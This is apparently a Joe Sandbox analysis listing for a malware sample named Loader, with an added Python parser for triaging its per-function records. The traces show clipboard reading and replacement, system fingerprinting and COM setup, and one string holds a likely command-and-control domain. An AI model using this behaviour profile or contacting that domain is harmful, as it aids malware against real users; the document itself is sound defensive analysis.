                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D4B5DA
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B5E1
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D4B61B
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B622
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction ID: 4d9e8ca46e5ea1e4e6b0e5e2bdac888de91c0f5c4ffdb548230135cd224fd082
                                                                                                  • Opcode Fuzzy Hash: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction Fuzzy Hash: D621F371600309AFDB20AF76CC848ABB7A9FF24374715851AF859DB251E730ED408BB0
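The records in this listing are emitted per function by the Joe Sandbox IDA plugin in a fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them easy to turn into structured data for triage. The parser below does that and tags each function by whether all of its resolved calls go into the statically linked MSVC runtime (LIBCMT, LIBCPMT, LIBVCRUNTIME) or reach a Windows DLL such as KERNEL32. It is an added example written for this page, not Joe Sandbox code and not part of the report; the field names are the ones visible in the listing, the sample input is constructed from three abridged records copied from the listing above, and the runtime/non-runtime split is a triage heuristic assumed here, not a classification the report makes.

```python
# Parse Joe Sandbox per-function records (the IDA plugin listing above) into
# Python objects. Added example, not Joe Sandbox code; the runtime-library
# split used for triage is an assumption made here, not a report field.
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass, field

# One API line: "GetLastError.KERNEL32(?,?,00D44464), ref: 00D4447B",
# "std::_Lockit::_Lockit.LIBCPMT ref: 00D37804", or the nested form
# "Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(...), ref: 00D45862".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.(]+)\.(?P<lib>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SCALAR_FIELDS = {"Source File": "source_file", "API ID": "api_id",
                 "String ID": "string_id", "Opcode ID": "opcode_id"}
RUNTIME_LIBS = {"LIBCMT", "LIBCPMT", "LIBVCRUNTIME"}  # static MSVC runtime, as labelled by the plugin


@dataclass
class ApiCall:
    name: str
    library: str
    ref: str                        # call-site address printed in the record
    args: list[str]
    subcall_of: str | None = None   # callee address when reported as "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    associated: list[str] = field(default_factory=list)
    source_file: str = ""
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """One record per function; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.apis.append(ApiCall(m["name"], m["lib"], m["ref"], args, m["caller"]))
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key in SCALAR_FIELDS:
            setattr(current, SCALAR_FIELDS[key], value)
        elif key == "Associated":
            current.associated.append(value.removesuffix("Download File"))  # web link text
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy_hash = value
            records.append(current)
            current = FunctionRecord()
    return records


def is_runtime_only(rec: FunctionRecord) -> bool:
    """Triage heuristic: every resolved call goes into the statically linked runtime."""
    return bool(rec.apis) and all(a.library in RUNTIME_LIBS for a in rec.apis)


def library_counts(records: list[FunctionRecord]) -> Counter:
    return Counter(a.library for r in records for a in r.apis)


# Constructed input: three records abridged from the listing above.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,00D44464,00D3A97D,00D39BD4), ref: 00D4447B
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D44489
• SetLastError.KERNEL32(00000000,00D44464,00D3A97D,00D39BD4), ref: 00D444F4
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• Opcode ID: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
• Instruction Fuzzy Hash: 5E01843211A7115FF7243BB4BC85B672B89EB41775B29023AF914952F2EFD14C829670
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D4F74C), ref: 00D4F6BD
• GetLastError.KERNEL32(?,00D4F74C,00000000), ref: 00D4F6C7
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D4F6EF
Strings
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• Instruction Fuzzy Hash: 7EE01230640305BBEB242B61DC0AB593B549B00B56F240070FD0CE41F1DBA29A5099B4
APIs
• __EH_prolog3.LIBCMT ref: 00D377F9
• std::_Lockit::_Lockit.LIBCPMT ref: 00D37804
  • Part of subcall function 00D376EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D37707
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_
• Instruction Fuzzy Hash: 040171B5A04A109BCB19EF20D85657DBB71FF94391F180109E80297391DF74AE06CBB1
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        tag = "runtime-only" if is_runtime_only(rec) else "reaches Win32"
        print(f"{rec.instruction_fuzzy_hash[:8]}  {tag:13}  {rec.api_id or '-'}")
    print(dict(library_counts(recs)))
```

Run it directly to get one line per function plus a per-library call count. Treat the tag as a hint rather than a verdict: the KERNEL32 records in this stretch of the listing (the mscoree.dll/CorExitProcess lookup, the two-step LoadLibraryExW with the api-ms- string, the console WriteFile path) carry API sets and strings that are consistent with compiler-linked runtime helpers too, so the heuristic only trims the obvious cases, and the functions it leaves still need to be read.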
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00D4C976
  • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9AE
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9CE
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• API String ID: 158306478-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000), ref: 00D544A7
• GetLastError.KERNEL32(?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?,?,00D4D486,?), ref: 00D544B3
  • Part of subcall function 00D54510: CloseHandle.KERNEL32(FFFFFFFE,00D544C3,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?), ref: 00D54520
• ___initconout.LIBCMT ref: 00D544C3
  • Part of subcall function 00D544E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D54481,00D539CC,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544F8
• WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544D8
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• API String ID: 2744216297-0
APIs
  • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
  • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D3F809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D4A1E5
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D3F809,?,?,?,00000055,?,-00000050,?,?), ref: 00D4A21C
Similarity
• API ID: ErrorLast$CodePageValid
• String ID: utf8
• API String ID: 943130320-905460609
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D45071,?,?,00000000,00000000,00000000,?), ref: 00D45195
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 00D44C53
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814

Execution Graph

Execution Coverage: 6.5%
Dynamic/Decrypted Code Coverage: 5.3%
Signature Coverage: 46.7%
Total number of Nodes: 304
Total number of Limit Nodes: 19
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: !$!$!$#$#$$$%$%$%$%$'$'$'$($($)$)$+$-$/$1$3$3$4$5$6$6$7$8$9$9$:$:$;$;$<$=$=$?$A$C$D$D$D$I$I$J$K$M$O$Q$Q$S$U$W$\$]$`$a$g$i$i$k$o$p$q$v$x$y${$}
• API String ID: 0-2157806064
• Opcode ID: 3de4518166a14f2ae89b5187a04fd900a9f2a3316777b08cad5282cdff0d505e
• Instruction ID: 3de8b0e864d2495a0009815e94a66544eb6cb25ac5ea341fc1d881c2dc3f52c9
• Opcode Fuzzy Hash: 3de4518166a14f2ae89b5187a04fd900a9f2a3316777b08cad5282cdff0d505e
• Instruction Fuzzy Hash: 1713CE3150C7C18AD3349B3889453DFBFD1ABD6324F188A6EE4E9873D2D67889828757

Control-flow Graph
APIs
• CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00438BCC
• SysAllocString.OLEAUT32(-X*^), ref: 00438C2B
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438C6B
• SysAllocString.OLEAUT32(PX), ref: 00438CBC
• SysAllocString.OLEAUT32(1FDB1DCF), ref: 00438D4B
• VariantInit.OLEAUT32(CCCFCEE9), ref: 00438DB7
• SysFreeString.OLEAUT32(?), ref: 00439079
• SysFreeString.OLEAUT32(?), ref: 0043907F
• SysFreeString.OLEAUT32(?), ref: 00439092
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004390C7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
• String ID: #fw$,\)B$-X*^$2=$7$YdB3$adB3
• API String ID: 2247799857-2780812687
• Opcode ID: 493ce23e70961967b078ef07cc2cf3f32dcd47f251a9ce8c4d2505a1d3330aab
• Instruction ID: fb0c433af6a3450d5babb11c9f329018bedb9ef95a219116fd7d3ff89bf2b34d
• Opcode Fuzzy Hash: 493ce23e70961967b078ef07cc2cf3f32dcd47f251a9ce8c4d2505a1d3330aab
• Instruction Fuzzy Hash: 3E42F175A083508BD714CF24C8407ABBBE2AFC9314F189A2DF5D59B391DBB9D806CB46

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: MetricsSystem
• String ID: $-2C$27C$43C$A-C$Q0C$T2C$^8C$.C$6C
• API String ID: 4116985748-1565625857
• Opcode ID: 9a7bccb0269d965fd8bf19ed920815c7b018a74b71be457f30273063258454ec
• Instruction ID: c4bc66bf91b4d2b79cba4133798209c934d4108bb079f107fafe31fe0a802b54
• Opcode Fuzzy Hash: 9a7bccb0269d965fd8bf19ed920815c7b018a74b71be457f30273063258454ec
• Instruction Fuzzy Hash: 77C16BB050D3858FE770DF15C9897CABBE4AB86708F11891EE6885B350CBB85549CF8B

Control-flow Graph

APIs
• Sleep.KERNELBASE(00000001), ref: 02FD1032
• OpenClipboard.USER32(00000000), ref: 02FD103C
• GetClipboardData.USER32(0000000D), ref: 02FD104C
• GlobalLock.KERNEL32(00000000), ref: 02FD105D
• GlobalAlloc.KERNEL32(00000002,-00000004), ref: 02FD1090
• GlobalLock.KERNEL32 ref: 02FD10A0
• GlobalUnlock.KERNEL32 ref: 02FD10C1
• EmptyClipboard.USER32 ref: 02FD10CB
• SetClipboardData.USER32(0000000D), ref: 02FD10D6
• GlobalFree.KERNEL32 ref: 02FD10E3
• GlobalUnlock.KERNEL32(?), ref: 02FD10ED
• CloseClipboard.USER32 ref: 02FD10F3
• GetClipboardSequenceNumber.USER32 ref: 02FD10F9
Memory Dump Source
• Source File: 00000002.00000002.2921643201.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: true
• Associated: 00000002.00000002.2921629166.0000000002FD0000.00000002.00000800.00020000.00000000.sdmp
• Associated: 00000002.00000002.2921657703.0000000002FD2000.00000002.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2fd0000_Loader.jbxd
Similarity
• API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
• String ID:
• API String ID: 1416286485-0
• Opcode ID: bd297c1f1aef93ec0241b280aa64dcbcc21e2876a440e3b881b4a74314724f0c
• Instruction ID: 9879cee55ebdcabd45a8cd69c45d74b69e8017f157fef9e32f58e5751120d79d
• Opcode Fuzzy Hash: bd297c1f1aef93ec0241b280aa64dcbcc21e2876a440e3b881b4a74314724f0c
• Instruction Fuzzy Hash: D9218631E452549BD7213BB5AC0DB6BB7AAFF04BC5F484928FE49E6152E7218810CBE1

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: U3W$" &$'2/B$)I&K$+E%G$XY$y
• API String ID: 0-81430434
• Opcode ID: 2a785b569511994cfe81ee56b85ae98a7e96026a29b10a024a8f20330c530cc2
• Instruction ID: 05021e0a9b25c4132836ee91ec2cccbdede4ee658622d0df3edd9005f2d7ce8f
• Opcode Fuzzy Hash: 2a785b569511994cfe81ee56b85ae98a7e96026a29b10a024a8f20330c530cc2
• Instruction Fuzzy Hash: 015214B5908741CFD720CF14D8857EBB7A1EFD5314F184A2EE4899B392E7389841CB9A

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: 3@8F$8==3$GD$Y$fancywaxxers.shop$l&?2$|L,B$_$|b
• API String ID: 0-935190559
• Opcode ID: 423b46a633b80c103a4ea6fee090211b61fb72b7d26b0ba6769946676044fa8e
• Instruction ID: 5fde230e024abcefded984e0f9f8708b11b29ffe5adda8a0fcabaa82b8d26408
• Opcode Fuzzy Hash: 423b46a633b80c103a4ea6fee090211b61fb72b7d26b0ba6769946676044fa8e
• Instruction Fuzzy Hash: E9D133B460C3909FE314CF24A99176BBBE1EFD2300F54896DE4D49B391D7B98805CB56

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: Uninitialize
• String ID: )./$VMNO$fancywaxxers.shop
• API String ID: 3861434553-2937570028

APIs
• GetCurrentProcessId.KERNEL32 ref: 00408714
• GetCurrentThreadId.KERNEL32 ref: 0040871E
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040883D
• GetForegroundWindow.USER32 ref: 00408973
  • Part of subcall function 0040CAD0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CAE3
  • Part of subcall function 0040B540: FreeLibrary.KERNEL32(00408A47), ref: 0040B546
  • Part of subcall function 0040B540: FreeLibrary.KERNEL32 ref: 0040B567
• ExitProcess.KERNEL32 ref: 00408A60
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0

APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B035
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: #$E?s:
• API String ID: 3960555810-1163437786

APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 004232AD
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: :B
• API String ID: 237503144-1307253848

Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: 2106D7020EE20555E1B71982A10B646A$OC$%n$%n
• API String ID: 0-4232941211
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: "/B$b.B
• API String ID: 0-3864085942
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: fhgn$ol
• API String ID: 0-4167283932
APIs
• LdrInitializeThunk.NTDLL(0044095A,00000002,00000018,?,?,00000018,?,?,?), ref: 0043D78E
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:

                                                                                                  Control-flow Graph (graph rendering omitted): basic blocks 437b21-437b54 (calls GetUserDefaultUILanguage), 437b56-437b59, 437b5b-437bb1, 437bb3-437be1; edges 437b21-437b54 -> 437b56-437b59, 437b56-437b59 -> 437bb3-437be1, 437b56-437b59 -> 437b5b-437bb1, 437b5b-437bb1 -> 437b56-437b59
                                                                                                  APIs
                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00437B27
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: DefaultLanguageUser
                                                                                                  • String ID: afg
                                                                                                  • API String ID: 95929093-2051710476
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042CCEC
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 0042CDF5
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID:
                                                                                                  • API String ID: 2904949787-0
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042CCEC
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 0042CDF5
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID:
                                                                                                  • API String ID: 2904949787-0
                                                                                                  APIs
                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EA9A
                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EAB2
                                                                                                  Similarity
                                                                                                  • API ID: InitializeSecurity
                                                                                                  • String ID:
                                                                                                  • API String ID: 640775948-0
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 0043E5F1
                                                                                                  • GetForegroundWindow.USER32 ref: 0043E602
                                                                                                  Similarity
                                                                                                  • API ID: ForegroundWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2020703349-0
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 0042CDF5
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CEDB
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CEDB
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
                                                                                                  APIs
                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B3D6,00000000,0040B4C3,?,00000000,?,00000000), ref: 0043D732
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  APIs
                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CAE3
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: e3328d60e13e08763a590f607267decf3ed7e7b0a47b7ce5f4a56b377a9a0e7d
                                                                                                  • Instruction ID: dbdd9efffb7d88f247d15ae5fb55354d3de962881ecde9a03d88c8b6cc828a37
                                                                                                  • Opcode Fuzzy Hash: e3328d60e13e08763a590f607267decf3ed7e7b0a47b7ce5f4a56b377a9a0e7d
                                                                                                  • Instruction Fuzzy Hash: EDD0A7355605447BD300A76DEC87F263A2CD383715F80033DF6B2D61D1DD50B810D6A9
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,0043D74B,?,0040B3D6,00000000,0040B4C3,?,00000000,?,00000000), ref: 0043BB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 3161d0ef386faad1ba3affe2a7e72304e0edea796f445b83e932b93f087e1c1a
                                                                                                  • Instruction ID: d5ae91fbceb27689ec3d00fc71b5606d02084d00300c79febeff79db76b4e50a
                                                                                                  • Opcode Fuzzy Hash: 3161d0ef386faad1ba3affe2a7e72304e0edea796f445b83e932b93f087e1c1a
                                                                                                  • Instruction Fuzzy Hash: 4FD0C93540A122FBC6502B19BC15BCB7A949F49221F0749A5B4406A0B5D674DC918AD8
                                                                                                  APIs
